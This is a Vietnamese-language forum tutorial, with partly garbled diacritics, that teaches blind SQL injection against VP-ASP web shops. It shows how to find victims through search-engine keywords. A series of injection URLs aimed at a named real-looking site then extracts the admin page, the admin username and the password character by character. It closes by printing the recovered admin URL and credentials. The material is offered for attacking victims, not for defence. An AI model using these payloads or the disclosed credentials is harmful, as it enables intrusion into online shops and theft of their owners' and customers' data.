---- Đây là phương pháp hack lỗi SQL nâng cao đối với các shop VP-ASP. Được sự giúp đỡ của 1 admin trong HCV hiện tại Quoc xin được chia sẻ với các bạn
********************************************** Vuln: SQL Inject in VP-ASP all of version
Exploiter: Unknown
Tool: Mozilla Firefox Download
**********************************************
Đầu tiên, bạn phải tìm ra shop của victim Cơng cụ:http://google.com/
Keyword: shopdisplayproducts.asp? shopaddtocart.asp?
shopexd.asp
Các bạn tự tìm thêm key cho mình nhé. Vắ dụởđây tui chọn shop
CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1
Sau đĩ chúng ta thêm dấu ' vao phắa sau link thành như sau CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1' Ok, chúng ta bắt đầu tìm link admin nhé
---- Tìm chữđầu tiên trong link admin, các bạn thêm dịng lệnh này vao phắa sau link trên nhé CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')
Chúng ta sẽ thay dần giá trị 's' sao cho ứng với kắ tựđầu tiên của link
Ởđây tui tìm được là kắ tự 'a'
---- Sau đĩ tìm tiếp chiều dài của link admin (thường thì tu gia trị thứ 5 trởđi vì link admin sẽ cĩ thêm .asp vắ du admin.asp <--- cĩ 9 kắ tự)
CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a' and len(fieldvalue)=5)
Thay tiếp giá trị 5 thành các giá trị số cho đến khi tìm được đúng chiều dài của link admin.
Ởđây mình tìm được là 15 ki tự
---- Tiếp theo tìm các kắ tự cịn lại trong link admin nhé. CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration% 20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='ad')
Thay đổi dần giá trị trong lệnh left ứng với vị trắ kắ tự của link admin. Sau khi tìm được link admin, chúng ta sẽđược adminonline.asp ---- Tiếp theo tìm username
Các bạn thêm câu truy vấn này phắa sau link nhé CODE
%20or%201=(select%20fldusername%20from%20tbluser%20where%20left(fldusername,1)='q') Khi đĩ câu truy vấn sẽ là
CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser% 20where%20left(fldusername,1)='s')
Ởđây kắ tựđầu tiên là 's'
---- Tiếp theo tìm chiều dài của username CODE (adsbygoogle = window.adsbygoogle || []).push({});
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser% 20where%20left(fldusername,1)='s' and len(fldusername)=3)
Chúng ta sẽ tìm được username là "sfp" ---- Tìm password
Cũng tương tự như trên chỉ cần thay fldusername bằng fldpassword Các bạn thêm câu truy vấn này phắa sau link nhé
CODE
%20or%201=(select%20fldpassword%20from%20tbluser%20where%fldusername='sfp' and left(fldpassword,1)='p') Tìm password tương ứng với username là "sfp". Chữđầu tiên là 'p'
Khi đĩ câu truy vấn sẽ là CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser% 20where%fldusername='sfp' and left(fldpassword,1)='p')
Ởđây kắ tựđầu tiên là 'p'
---- Tiếp theo tìm chiều dài của password CODE
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser% 20where%fldusername='sfp' and left(fldpassword,1)='p' and len(fldpassword)=11)
Sau khi tìm được chúng ta sẽ co pass là 'performance'
************************************************************* Cuối cùng sau khi hồn tất chúng ta sẽ cĩ link admin là
http://www.sfp.net/adminonline.asp
user: sfp